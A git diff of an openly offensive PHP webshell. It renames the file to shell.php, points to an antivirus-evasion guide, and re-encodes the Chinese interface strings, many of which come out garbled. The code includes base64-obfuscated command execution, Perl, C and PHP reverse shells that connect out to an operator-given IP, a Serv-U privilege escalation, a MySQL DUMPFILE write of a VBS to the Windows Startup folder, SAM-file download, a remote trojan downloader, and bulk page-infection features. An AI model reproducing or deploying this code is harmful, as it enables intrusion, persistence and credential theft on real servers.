diff --git a/README.md b/README.md index 77b4678..4142577 100644 --- a/README.md +++ b/README.md @@ -2,7 +2,16 @@ ### 具体介绍:https://yzddmr6.tk/2019/09/01/BestShell/ -### 代码开源不含后门,免杀自己做。 +### 代码开源不含后门 + +### 如何利用webshell-venom对大马免杀: +https://yzddmr6.tk/2019/09/03/webshell-venom-3-3/ + +### TODO + +1. 内嵌 `https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD` + +2. 把path参数base64一遍 ## 4.0 更新日志 diff --git a/best_php_shell.php b/shell.php similarity index 82% rename from best_php_shell.php rename to shell.php index 6ef7eb9..3436e36 100644 --- a/best_php_shell.php +++ b/shell.php @@ -1,5 +1,5 @@ 用户或密码错误'; + echo '
û
'; } } islogin($shellname,$myurl); @@ -61,24 +61,24 @@ } $class = array( -"信息操作" => array("upfiles" => "上传文件","phpinfo" => "基本信息","info_f" => "系统信息","phpcode" => "执行PHP脚本"), -"提权工具" => array("sqlshell" => "执行SQL执行","mysql_exec" => "MYSQL操作","myexp" => "MYSQL提权","servu" => "Serv-U提权","cmd" => "执行命令","linux" => "反弹提权","downloader" => "文件下载","port" => "端口扫描"), -"批量操作" => array("guama" => "批量挂马清马","tihuan" => "批量替换内容","scanfile" => "批量搜索文件","scanphp" => "批量查找木马"), -"脚本插件" => array("getcode" => "在线代理") +"Ϣ" => array("upfiles" => "ϴļ","phpinfo" => "Ϣ","info_f" => "ϵͳϢ","phpcode" => "ִPHPű"), +"Ȩ" => array("sqlshell" => "ִSQLִ","mysql_exec" => "MYSQL","myexp" => "MYSQLȨ","servu" => "Serv-UȨ","cmd" => "ִ","linux" => "Ȩ","downloader" => "ļ","port" => "˿ɨ"), +"" => array("guama" => "","tihuan" => "滻","scanfile" => "ļ","scanphp" => "ľ"), +"ű" => array("getcode" => "ߴ") ); -$msg = array("0" => "保存成功","1" => "保存失败","2" => "上传成功","3" => "上传失败","4" => "修改成功","5" => "修改失败","6" => "删除成功","7" => "删除失败"); +$msg = array("0" => "ɹ","1" => "ʧ","2" => "ϴɹ","3" => "ϴʧ","4" => "޸ijɹ","5" => "޸ʧ","6" => "ɾɹ","7" => "ɾʧ"); css_main(); switch($eanver){ case "left": css_left(); html_n("
"); - html_img("title");html_n(" 本地硬盘
"); $i = 2; foreach($class as $name => $array){ @@ -91,8 +91,8 @@ $i++; } html_n("
"); - html_img("title");html_n(" 其它操作
"); html_n(""); break; @@ -105,12 +105,12 @@ $NUM_D = $NUM_F = 0; if(!$_SERVER['SERVER_NAME']) $GETURL = ''; else $GETURL = 'http://'.$_SERVER['SERVER_NAME'].'/'; $ROOT_DIR = File_Mode(); - html_n("
地址:"); - html_n("
"); + html_n("
ַ:"); + html_n("
"); html_n("
"); - html_n(" "); + html_n(" "); html_input("file","upfilet","","      "); - html_input("submit","uploadt","上传"); + html_input("submit","uploadt","ϴ"); if(!empty($_POST['newfile'])){ if(isset($_POST['bin'])) $bin = $_POST['bin']; else $bin = "wb"; $newfile=base64_decode($_POST['newfile']); @@ -120,10 +120,10 @@ @touch($newfile,@strtotime($_POST['time'])); } html_n('
'); - html_n(''); - html_n(''); + html_a('?eanver=main&path='.uppath($path),'ϼĿ¼'); + html_n(''); + html_n(''); + html_n(''); while($dirs = @$dir->read()){ if($dirs == '.' or $dirs == '..') continue; $dirpath = str_path("$path/$dirs"); @@ -135,9 +135,9 @@ html_img("dir"); html_a('?eanver=main&path='.$dirpath,$dirs); html_n(''); $NUM_F++; } @@ -188,12 +188,12 @@
- - - - - -目录({$NUM_D}) / 文件({$NUM_F})
+ + + + + +Ŀ¼({$NUM_D}) / ļ({$NUM_F}) END; break; @@ -226,7 +226,7 @@ $FILE_CODE = ""; $charset= 'GB2312'; $FILE_TIME =date('Y-m-d H:i:s',time()+3600*8); - if(@file_exists($p)) echo '发现目录下有"同名"文件
'; + if(@file_exists($p)) echo 'Ŀ¼"ͬ"ļ
'; }else{ $jspath=urlencode($p); $FILE_TIME = date('Y-m-d H:i:s',filemtime($p)); @@ -241,20 +241,20 @@ $FILE_CODE = htmlspecialchars($FILE_CODE); } print<<查找内容: - +
: +
-指定编码: - +ָ룺 + END; html_select(array("GB2312" => "GB2312","UTF-8" => "UTF-8","BIG5" => "BIG5","EUC-KR" => "EUC-KR","EUC-JP" => "EUC-JP","SHIFT-JIS" => "SHIFT-JIS","WINDOWS-874" => "WINDOWS-874","ISO-8859-1" => "ISO-8859-1"),$charset,"onchange=\"window.location='?eanver=editr&p={$jspath}&charset='+options[selectedIndex].value;\""); print<<
-
文件修改时间 以二进制形式保存文件(建议使用)
-
-
+
ļ޸ʱ Զʽļ(ʹ)
+
+
END; break; @@ -291,13 +291,13 @@ break; case "perm": - html_n("
'); if(!empty($_POST['path'])){ - html_n(''); if(!empty($_POST['path'])){ - html_n(''); if(!empty($_POST['path'])){ - html_n(''); if(!empty($_POST['path'])){ - html_n(' - + - + @@ -1061,30 +1061,30 @@ function delTank() { case "servu": $SUPass = isset($_POST['SUPass']) ? $_POST['SUPass'] : '#l@$ak#.lk;0@P'; print<<[执行命令] [添加用户] + -
ServU端口
-
ServU用户
-
ServU密码
+
ServU˿
+
ServUû
+
ServU
END; if($_GET['o'] == 'adduser') { print<<帐号 -密码 -目录 +
ʺ + +Ŀ¼
END; } else { print<<提权命令
+
Ȩ
END; } -echo '
'; +echo '
'; if((!empty($_POST['SUPort'])) && (!empty($_POST['SUUser'])) && (!empty($_POST['SUPass']))) { echo '
'; @@ -1097,57 +1097,57 @@ function delTank() { $deldomain = "-DELETEDOMAIN\r\n"."-IP=0.0.0.0\r\n"." PortNo=21\r\n"; $sock = @fsockopen("127.0.0.1", $_POST["SUPort"],$errno,$errstr, 10); $recvbuf = @fgets($sock, 1024); - echo "返回数据包: $recvbuf
"; + echo "ݰ: $recvbuf
"; $sendbuf = "USER ".$_POST["SUUser"]."\r\n"; @fputs($sock, $sendbuf, strlen($sendbuf)); - echo "发送数据包: $sendbuf
"; + echo "ݰ: $sendbuf
"; $recvbuf = @fgets($sock, 1024); - echo "返回数据包: $recvbuf
"; + echo "ݰ: $recvbuf
"; $sendbuf = "PASS ".$_POST["SUPass"]."\r\n"; @fputs($sock, $sendbuf, strlen($sendbuf)); - echo "发送数据包: $sendbuf
"; + echo "ݰ: $sendbuf
"; $recvbuf = @fgets($sock, 1024); - echo "返回数据包: $recvbuf
"; + echo "ݰ: $recvbuf
"; $sendbuf = "SITE MAINTENANCE\r\n"; @fputs($sock, $sendbuf, strlen($sendbuf)); - echo "发送数据包: $sendbuf
"; + echo "ݰ: $sendbuf
"; $recvbuf = @fgets($sock, 1024); - echo "返回数据包: $recvbuf
"; + echo "ݰ: $recvbuf
"; $sendbuf = $domain; @fputs($sock, $sendbuf, strlen($sendbuf)); - echo "发送数据包: $sendbuf
"; + echo "ݰ: $sendbuf
"; $recvbuf = @fgets($sock, 1024); - echo "返回数据包: $recvbuf
"; + echo "ݰ: $recvbuf
"; $sendbuf = $adduser; @fputs($sock, $sendbuf, strlen($sendbuf)); - echo "发送数据包: $sendbuf
"; + echo "ݰ: $sendbuf
"; $recvbuf = @fgets($sock, 1024); - echo "返回数据包: $recvbuf
"; + echo "ݰ: $recvbuf
"; if(!empty($_POST['SUCommand'])) { $exp = @fsockopen("127.0.0.1", "21",$errno,$errstr, 10); $recvbuf = @fgets($exp, 1024); - echo "返回数据包: $recvbuf
"; + echo "ݰ: $recvbuf
"; $sendbuf = "USER ".$_POST['user']."\r\n"; @fputs($exp, $sendbuf, strlen($sendbuf)); - echo "发送数据包: $sendbuf
"; + echo "ݰ: $sendbuf
"; $recvbuf = @fgets($exp, 1024); - echo "返回数据包: $recvbuf
"; + echo "ݰ: $recvbuf
"; $sendbuf = "PASS ".$_POST['password']."\r\n"; @fputs($exp, $sendbuf, strlen($sendbuf)); - echo "发送数据包: $sendbuf
"; + echo "ݰ: $sendbuf
"; $recvbuf = @fgets($exp, 1024); - echo "返回数据包: $recvbuf
"; + echo "ݰ: $recvbuf
"; $sendbuf = "site exec ".$_POST["SUCommand"]."\r\n"; @fputs($exp, $sendbuf, strlen($sendbuf)); - echo "发送数据包: site exec ".$_POST["SUCommand"]."
"; + echo "ݰ: site exec ".$_POST["SUCommand"]."
"; $recvbuf = @fgets($exp, 1024); - echo "返回数据包: $recvbuf
"; + echo "ݰ: $recvbuf
"; $sendbuf = $deldomain; @fputs($sock, $sendbuf, strlen($sendbuf)); - echo "发送数据包: $sendbuf
"; + echo "ݰ: $sendbuf
"; $recvbuf = @fgets($sock, 1024); - echo "返回数据包: $recvbuf
"; + echo "ݰ: $recvbuf
"; @fclose($exp); } @fclose($sock); @@ -1163,7 +1163,7 @@ function delTank() { echo 'function SubmitUrl(){ document.getElementById(\'phpcode\').value = base64encode(document.getElementById(\'phpcode\').value); document.getElementById(\'sendcode\').submit(); - }
'); - html_a('?eanver=main&path='.uppath($path),'上级目录'); - html_n('操作文件属性('.get_current_user().')用户|组修改时间文件大小
ļ('.get_current_user().')û|޸ʱļС
'); - html_n("改名"); - html_n("删除 "); - html_a('?pack='.$dirpath,'打包'); + html_n(""); + html_n("ɾ "); + html_a('?pack='.$dirpath,''); html_n(''); html_a('?eanver=perm&p='.$dirpath.'&chmod='.$perm,$perm); html_n(''.GetFileOwner("$path/$dirs").':'.GetFileGroup("$path/$dirs")); @@ -164,19 +164,19 @@ html_a($Fileurls,$files,'target="_blank"'); html_n(''); if(($it=='.gz') or ($it=='zip') or ($it=='tar') or ($it=='.7z')) - html_a('?unzip='.$filepath,'解压','title="解压'.$files.'" onClick="rusurechk(\''.$todir.'\',\'?unzip='.$filepath.'&todir=\');return false;"'); + html_a('?unzip='.$filepath,'ѹ','title="ѹ'.$files.'" onClick="rusurechk(\''.$todir.'\',\'?unzip='.$filepath.'&todir=\');return false;"'); else - html_a('?eanver=editr&p='.$filepath,'编辑','title="编辑'.$files.'"'); + html_a('?eanver=editr&p='.$filepath,'༭','title="༭'.$files.'"'); - html_n("改名"); - html_n("删除 "); - html_n("复制"); - html_a('?down='.$filepath,'下载','编辑','title="下载'.$files.'"'); + html_n(""); + html_n("ɾ "); + html_n(""); + html_a('?down='.$filepath,'','༭','title="'.$files.'"'); html_n(''); html_a('?eanver=perm&p='.$filepath.'&chmod='.$perm,$perm); html_n(''.GetFileOwner("$path/$files").':'.GetFileGroup("$path/$files")); html_n(''.$filetime.''); - html_a('?down='.$filepath,$fsize,'title="下载'.$files.'"'); + html_a('?down='.$filepath,$fsize,'title="'.$files.'"'); html_n('
".$p.' 属性为: '); + html_n("
".$p.' Ϊ: '); if(is_dir($p)){ html_select(array("0777" => "0777","0755" => "0755","0555" => "0555"),$_GET['chmod']); }else{ html_select(array("0666" => "0666","0644" => "0644","0444" => "0444"),$_GET['chmod']); } - html_input("submit","save","修改"); + html_input("submit","save","޸"); back(); if($_POST['class']){ switch($_POST['class']){ @@ -316,53 +316,53 @@ case "info_f": $dis_func = get_cfg_var("disable_functions"); - $upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传"; + $upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "ϴ"; $adminmail = (isset($_SERVER['SERVER_ADMIN'])) ? "".$_SERVER['SERVER_ADMIN']."" : "".get_cfg_var("sendmail_from").""; if($dis_func == ""){$dis_func = "No";}else{$dis_func = str_replace(" ","
",$dis_func);$dis_func = str_replace(",","
",$dis_func);} $phpinfo = (!eregi("phpinfo",$dis_func)) ? "Yes" : "No"; $info = array( - array("服务器时间",date("Y年m月d日 h:i:s",time())), - array("服务器域名","".$_SERVER['SERVER_NAME'].""), - array("服务器IP地址",gethostbyname($_SERVER['SERVER_NAME'])), - array("服务器操作系统",PHP_OS), - array("服务器操作系统文字编码",$_SERVER['HTTP_ACCEPT_LANGUAGE']), - array("服务器解译引擎",$_SERVER['SERVER_SOFTWARE']), - array("你的IP",$_SERVER["REMOTE_ADDR"]), - array("Web服务端口",$_SERVER['SERVER_PORT']), - array("PHP运行方式",strtoupper(php_sapi_name())), - array("PHP版本",PHP_VERSION), - array("运行于安全模式",Info_Cfg("safemode")), - array("服务器管理员",$adminmail), - array("本文件路径",myaddress), - array("允许使用 URL 打开文件 allow_url_fopen",Info_Cfg("allow_url_fopen")), - array("允许使用curl_exec",Info_Fun("curl_exec")), - array("允许动态加载链接库 enable_dl",Info_Cfg("enable_dl")), - array("显示错误信息 display_errors",Info_Cfg("display_errors")), - array("自动定义全局变量 register_globals",Info_Cfg("register_globals")), + array("ʱ",date("Ymd h:i:s",time())), + array("","".$_SERVER['SERVER_NAME'].""), + array("IPַ",gethostbyname($_SERVER['SERVER_NAME'])), + array("ϵͳ",PHP_OS), + array("ϵͳֱ",$_SERVER['HTTP_ACCEPT_LANGUAGE']), + array("",$_SERVER['SERVER_SOFTWARE']), + array("IP",$_SERVER["REMOTE_ADDR"]), + array("Web˿",$_SERVER['SERVER_PORT']), + array("PHPзʽ",strtoupper(php_sapi_name())), + array("PHP汾",PHP_VERSION), + array("ڰȫģʽ",Info_Cfg("safemode")), + array("Ա",$adminmail), + array("ļ·",myaddress), + array("ʹ URL ļ allow_url_fopen",Info_Cfg("allow_url_fopen")), + array("ʹcurl_exec",Info_Fun("curl_exec")), + array("̬ӿ enable_dl",Info_Cfg("enable_dl")), + array("ʾϢ display_errors",Info_Cfg("display_errors")), + array("Զȫֱ register_globals",Info_Cfg("register_globals")), array("magic_quotes_gpc",Info_Cfg("magic_quotes_gpc")), - array("程序最多允许使用内存量 memory_limit",Info_Cfg("memory_limit")), - array("POST最大字节数 post_max_size",Info_Cfg("post_max_size")), - array("允许最大上传文件 upload_max_filesize",$upsize), - array("程序最长运行时间 
max_execution_time",Info_Cfg("max_execution_time")."秒"), - array("被禁用的函数 disable_functions",$dis_func), + array("ʹڴ memory_limit",Info_Cfg("memory_limit")), + array("POSTֽ post_max_size",Info_Cfg("post_max_size")), + array("ϴļ upload_max_filesize",$upsize), + array("ʱ max_execution_time",Info_Cfg("max_execution_time").""), + array("õĺ disable_functions",$dis_func), array("phpinfo()",$phpinfo), - array("目前还有空余空间diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'), - array("图形处理 GD Library",Info_Fun("imageline")), - array("IMAP电子邮件系统",Info_Fun("imap_close")), - array("MySQL数据库",Info_Fun("mysql_close")), - array("SyBase数据库",Info_Fun("sybase_close")), - array("Oracle数据库",Info_Fun("ora_close")), - array("Oracle 8 数据库",Info_Fun("OCILogOff")), - array("PREL相容语法 PCRE",Info_Fun("preg_match")), - array("PDF文档支持",Info_Fun("pdf_close")), - array("Postgre SQL数据库",Info_Fun("pg_close")), - array("SNMP网络管理协议",Info_Fun("snmpget")), - array("压缩文件支持(Zlib)",Info_Fun("gzclose")), - array("XML解析",Info_Fun("xml_set_object")), + array("Ŀǰпռdiskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'), + array("ͼδ GD Library",Info_Fun("imageline")), + array("IMAPʼϵͳ",Info_Fun("imap_close")), + array("MySQLݿ",Info_Fun("mysql_close")), + array("SyBaseݿ",Info_Fun("sybase_close")), + array("Oracleݿ",Info_Fun("ora_close")), + array("Oracle 8 ݿ",Info_Fun("OCILogOff")), + array("PREL﷨ PCRE",Info_Fun("preg_match")), + array("PDFĵ֧",Info_Fun("pdf_close")), + array("Postgre SQLݿ",Info_Fun("pg_close")), + array("SNMPЭ",Info_Fun("snmpget")), + array("ѹļ֧(Zlib)",Info_Fun("gzclose")), + array("XML",Info_Fun("xml_set_object")), array("FTP",Info_Fun("ftp_login")), - array("ODBC数据库连接",Info_Fun("odbc_close")), - array("Session支持",Info_Fun("session_start")), - array("Socket支持",Info_Fun("fsockopen")), + array("ODBCݿ",Info_Fun("odbc_close")), + array("Session֧",Info_Fun("session_start")), + array("Socket֧",Info_Fun("fsockopen")), ); $shell = new COM("WScript.Shell") or die("This thing requires 
Windows Scripting Host"); echo ''; @@ -371,15 +371,15 @@ $Telnet = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\TelnetServer\\1.0\\TelnetPort"); $PcAnywhere = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Symantec\\pcAnywhere\\CurrentVersion\\System\\TCPIPDataPort"); }catch(Exception $e){} - echo ''."\n"; - echo ''."\n"; - echo ''."\n"; + echo ''."\n"; + echo ''."\n"; + echo ''."\n"; echo '
Terminal Service端口为'.$registry_proxystring.'
Telnet端口为'.$Telnet.'
PcAnywhere端口为'.$PcAnywhere.'
Terminal Service˿Ϊ'.$registry_proxystring.'
Telnet˿Ϊ'.$Telnet.'
PcAnywhere˿Ϊ'.$PcAnywhere.'
'; break; case "cmd": - $res = '回显窗口'; + $res = 'Դ'; $cmd = 'whoami'; if(!empty($_POST['cmd'])){$res = Exec_Run(base64_decode($_POST['cmd']));$cmd = htmlspecialchars(base64_decode($_POST['cmd']));} @@ -409,21 +409,21 @@ function SubmitUrl(){ document.getElementById('gform').submit(); } -
执行命令新增很多隐藏函数,外加使用BASE64加密提交,防止被拦(小细节,大成就)
-命令参数 +
ִܶغʹBASE64ύֹСϸڣɾͣ
+ - +
@@ -439,19 +439,19 @@ function SubmitUrl(){ $system=strtoupper(substr(PHP_OS, 0, 3)); print<<使用方法:
- 先在自己电脑运行"nc -vv -l 12388"
- 然后在此填写你电脑的IP,点连接!此反弹很全很实用!包括NC反弹!
+
ʹ÷
+ Լ"nc -vv -l 12388"
+ ȻڴдԵIP,ӣ˷ȫʵãNC
-
你的地址
-
连接端口
-
执行方式
+
Ӷ˿
+
ִзʽ
-
+
END; if((!empty($_POST['yourip'])) && (!empty($_POST['yourport']))) { @@ -468,11 +468,11 @@ function SubmitUrl(){ "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; - echo File_Write('/tmp/envl_bc',base64_decode($back_connect_pl),'wb') ? '创建/tmp/envl_bc成功
' : '创建/tmp/envl_bc失败
'; + echo File_Write('/tmp/envl_bc',base64_decode($back_connect_pl),'wb') ? '/tmp/envl_bcɹ
' : '/tmp/envl_bcʧ
'; $perlpath = Exec_Run('which perl'); $perlpath = $perlpath ? chop($perlpath) : 'perl'; @unlink('/tmp/envl_bc.c'); - echo Exec_Run($perlpath.' /tmp/envl_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -vv -l '.$_POST['yourport'] : '执行命令失败'; + echo Exec_Run($perlpath.' /tmp/envl_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -vv -l '.$_POST['yourport'] : 'ִʧ'; } if($_POST['use'] == 'c') { @@ -484,10 +484,10 @@ function SubmitUrl(){ "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D". "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp". "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; - echo File_Write('/tmp/envl_bc.c',base64_decode($back_connect_c),'wb') ? '创建/tmp/envl_bc.c成功
' : '创建/tmp/envl_bc.c失败
'; + echo File_Write('/tmp/envl_bc.c',base64_decode($back_connect_c),'wb') ? '/tmp/envl_bc.cɹ
' : '/tmp/envl_bc.cʧ
'; $res = Exec_Run('gcc -o /tmp/envl_bc /tmp/envl_bc.c'); @unlink('/tmp/envl_bc.c'); - echo Exec_Run('/tmp/envl_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -vv -l '.$_POST['yourport'] : '执行命令失败'; + echo Exec_Run('/tmp/envl_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -vv -l '.$_POST['yourport'] : 'ִʧ'; } if($_POST['use'] == 'php') { @@ -515,12 +515,12 @@ function SubmitUrl(){ $host=gethostbyname($host); $proto=getprotobyname("tcp"); if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0){ - die("Socket创建失败"); + die("Socketʧ"); } if(($ret=socket_connect($sock,$host,$port))<0){ - die("连接失败"); + die("ʧ"); }else{ - $message="----------------------PHP反弹连接--------------------\n"; + $message="----------------------PHP--------------------\n"; socket_write($sock,$message,strlen($message)); $cwd=str_replace('\\','/',dirname(__FILE__)); while($cmd=socket_read($sock,65535,$proto)){ @@ -566,7 +566,7 @@ function SubmitUrl(){ echo ''; } - echo '
你可以尝试连接端口 (nc -vv -l '.$_POST['yourport'].') '; + echo '
ԳӶ˿ (nc -vv -l '.$_POST['yourport'].') '; } break; @@ -577,7 +577,7 @@ function SubmitUrl(){ { $mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport']; if($conn = mysql_connect($mhost.':'.$mport,$muser,$mpass)) @mysql_select_db($mdata); - else $MSG_BOX = '连接MYSQL失败'; + else $MSG_BOX = 'MYSQLʧ'; } $downfile = 'c:/windows/repair/sam'; if(!empty($_POST['downfile'])) @@ -599,7 +599,7 @@ function SubmitUrl(){ echo $downcode; exit; } - else $MSG_BOX = '下载文件失败'; + else $MSG_BOX = 'ļʧ'; } $o = isset($_GET['o']) ? $_GET['o'] : ''; print<<
-
+
-地址 -端口 -用户 -密码 -库名 +˿ + +
END; if($o == 'u') { - $uppath = 'C:/Documents and Settings/All Users/「开始」菜单/程序/启动/exp.vbs'; + $uppath = 'C:/Documents and Settings/All Users/ʼ˵///exp.vbs'; if(!empty($_POST['uppath'])) { $uppath = $_POST['uppath']; @@ -649,24 +649,24 @@ function SubmitUrl(){ if(@mysql_query($query,$conn)) { $query = 'SELECT cmd FROM a INTO DUMPFILE \''.$uppath.'\';'; - $MSG_BOX = @mysql_query($query,$conn) ? '上传文件成功' : '上传文件失败'; + $MSG_BOX = @mysql_query($query,$conn) ? 'ϴļɹ' : 'ϴļʧ'; } - else $MSG_BOX = '插入临时表失败'; + else $MSG_BOX = 'ʱʧ'; @mysql_query('Drop TABLE IF EXISTS a;',$conn); } - else $MSG_BOX = '创建临时表失败'; + else $MSG_BOX = 'ʱʧ'; } print<<
上传路径 -

选择文件 -
+

ϴ· +

ѡļ +
END; } elseif($o == 'd') { print<<

下载文件 -
+


ļ +
END; } else @@ -677,7 +677,7 @@ function SubmitUrl(){ $msql = base64_decode($msql); if($result = @mysql_query($msql,$conn)) { - $MSG_BOX = '执行SQL语句成功
'; + $MSG_BOX = 'ִSQLɹ
'; $k = 0; while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;} } @@ -687,12 +687,12 @@ function SubmitUrl(){
- + END; } if($MSG_BOX != '') echo '
'.$MSG_BOX.'
'; @@ -704,16 +704,16 @@ function SubmitUrl(){ $Com_dpath= isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress).'/muma.exe'); print<< -
超连接
-
下载到
-
+
+
ص
+
END; if((!empty($_POST['durl'])) && (!empty($_POST['dpath']))) { echo '
'; $contents = @file_get_contents($_POST['durl']); - if(!$contents) echo '无法读取要下载的数据'; - else echo File_Write($_POST['dpath'],$contents,'wb') ? '下载文件成功' : '下载文件失败'; + if(!$contents) echo '޷ȡҪص'; + else echo File_Write($_POST['dpath'],$contents,'wb') ? 'ļɹ' : 'ļʧ'; echo '
'; } break; @@ -731,14 +731,14 @@ function SubmitUrl(){ if($_SESSION['sql_user'] && $_SESSION['sql_password']){ if(!($sqlcon = @mysql_connect($_SESSION['sql_host'].':'.$_SESSION['sql_port'],$_SESSION['sql_user'],$_SESSION['sql_password']))){ unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']); - die(html_a('?eanver=sqlshell','连接失败请返回')); + die(html_a('?eanver=sqlshell','ʧ뷵')); } } else{ - die(html_a('?eanver=sqlshell','连接失败请返回')); + die(html_a('?eanver=sqlshell','ʧ뷵')); } $query = mysql_query("SHOW DATABASES",$sqlcon); - html_n('
数据库列表:'); + html_n('
ݿб:'); while($db = mysql_fetch_array($query)) { html_a('?eanver=issql&db='.$db['Database'],$db['Database']); echo '  '; @@ -748,17 +748,17 @@ function SubmitUrl(){ css_js("3"); mysql_select_db($_GET['db'], $sqlcon); html_n('

'); - html_select(array(0=>"--SQL语法--",7=>"添加数据",8=>"删除数据",9=>"修改数据",10=>"建数据表",11=>"删数据表",12=>"添加字段",13=>"删除字段"),0,"onchange='return Full(options[selectedIndex].value)'"); - html_input("submit","doquery","执行"); + html_select(array(0=>"--SQL﷨--",7=>"",8=>"ɾ",9=>"޸",10=>"ݱ",11=>"ɾݱ",12=>"ֶ",13=>"ɾֶ"),0,"onchange='return Full(options[selectedIndex].value)'"); + html_input("submit","doquery","ִ"); html_a("?eanver=issql&db=".$_GET['db'],$_GET['db']); html_n('--->'); html_a("?eanver=issql&db=".$_GET['db']."&table=".$_GET['table'],$_GET['table']); html_n('

'); if(!empty($_POST['sql'])){ if (@mysql_query($_POST['sql'],$sqlcon)) { - echo "执行SQL语句成功"; + echo "ִSQLɹ"; }else{ - echo "出错: ".mysql_error(); + echo ": ".mysql_error(); } } if($_GET['table']){ @@ -795,16 +795,16 @@ function SubmitUrl(){ $Com_dpath= isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress).'/muma.exe'); print<< -
超连接
-
下载到
-
+
+
ص
+
END; if((!empty($_POST['durl'])) && (!empty($_POST['dpath']))) { echo '
'; $contents = @file_get_contents($_POST['durl']); - if(!$contents) echo '无法读取要下载的数据'; - else echo File_Write($_POST['dpath'],$contents,'wb') ? '下载文件成功' : '下载文件失败'; + if(!$contents) echo '޷ȡҪص'; + else echo File_Write($_POST['dpath'],$contents,'wb') ? 'ļɹ' : 'ļʧ'; echo '
'; } break; @@ -822,14 +822,14 @@ function SubmitUrl(){ if($_SESSION['sql_user'] && $_SESSION['sql_password']){ if(!($sqlcon = @mysql_connect($_SESSION['sql_host'].':'.$_SESSION['sql_port'],$_SESSION['sql_user'],$_SESSION['sql_password']))){ unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']); - die(html_a('?eanver=sqlshell','连接失败请返回')); + die(html_a('?eanver=sqlshell','ʧ뷵')); } } else{ - die(html_a('?eanver=sqlshell','连接失败请返回')); + die(html_a('?eanver=sqlshell','ʧ뷵')); } $query = mysql_query("SHOW DATABASES",$sqlcon); - html_n('
数据库列表:'); + html_n('
ݿб:'); while($db = mysql_fetch_array($query)) { html_a('?eanver=issql&db='.$db['Database'],$db['Database']); echo '  '; @@ -839,17 +839,17 @@ function SubmitUrl(){ css_js("3"); mysql_select_db($_GET['db'], $sqlcon); html_n('

'); - html_select(array(0=>"--SQL语法--",7=>"添加数据",8=>"删除数据",9=>"修改数据",10=>"建数据表",11=>"删数据表",12=>"添加字段",13=>"删除字段"),0,"onchange='return Full(options[selectedIndex].value)'"); - html_input("submit","doquery","执行"); + html_select(array(0=>"--SQL﷨--",7=>"",8=>"ɾ",9=>"޸",10=>"ݱ",11=>"ɾݱ",12=>"ֶ",13=>"ɾֶ"),0,"onchange='return Full(options[selectedIndex].value)'"); + html_input("submit","doquery","ִ"); html_a("?eanver=issql&db=".$_GET['db'],$_GET['db']); html_n('--->'); html_a("?eanver=issql&db=".$_GET['db']."&table=".$_GET['table'],$_GET['table']); html_n('

'); if(!empty($_POST['sql'])){ if (@mysql_query($_POST['sql'],$sqlcon)) { - echo "执行SQL语句成功"; + echo "ִSQLɹ"; }else{ - echo "出错: ".mysql_error(); + echo ": ".mysql_error(); } } if($_GET['table']){ @@ -882,8 +882,8 @@ function SubmitUrl(){ break; case "upfiles": - html_n('
服务器限制上传单个文件大小: '.@get_cfg_var('upload_max_filesize').'
'); - html_input("text","uppath",root_dir,"
上传到路径: ","51"); + html_n('
ϴļС: '.@get_cfg_var('upload_max_filesize').''); + html_input("text","uppath",root_dir,"
ϴ·: ","51"); print<< function addTank(){ @@ -891,7 +891,7 @@ function addTank(){ k=k+1; k=tank.rows.length; newRow=document.all.tank.insertRow(-1) - + newcell=newRow.insertCell() newcell.innerHTML=" " } @@ -908,7 +908,7 @@ function delTank() { } if (checkit) { } else{ - alert("请选择一个要删除的对象"); + alert("ѡһҪɾĶ"); return false; } } @@ -916,17 +916,17 @@ function delTank() {

-
- + +
- +
请选择要上传的文件:
ѡҪϴļ
END; - html_n('
'); + html_n('
'); if($_POST['upfiles']){ foreach ($_FILES["upfile"]["error"] as $key => $error){ if ($error == UPLOAD_ERR_OK){ @@ -945,33 +945,33 @@ function delTank() { $patht = isset($_POST['path']) ? $_POST['path'] : root_dir; $typet = isset($_POST['type']) ? $_POST['type'] : ".html|.shtml|.htm|.asp|.php|.jsp|.cgi|.aspx"; $codet = isset($_POST['code']) ? $_POST['code'] : ""; - html_n('
文件类型请用"|"隔开,也可以是指定文件名.
'); - html_input("text","path",$patht,"路径范围","45"); - html_input("checkbox","pass","","使用目录遍历","",true); - html_input("text","type",$typet,"

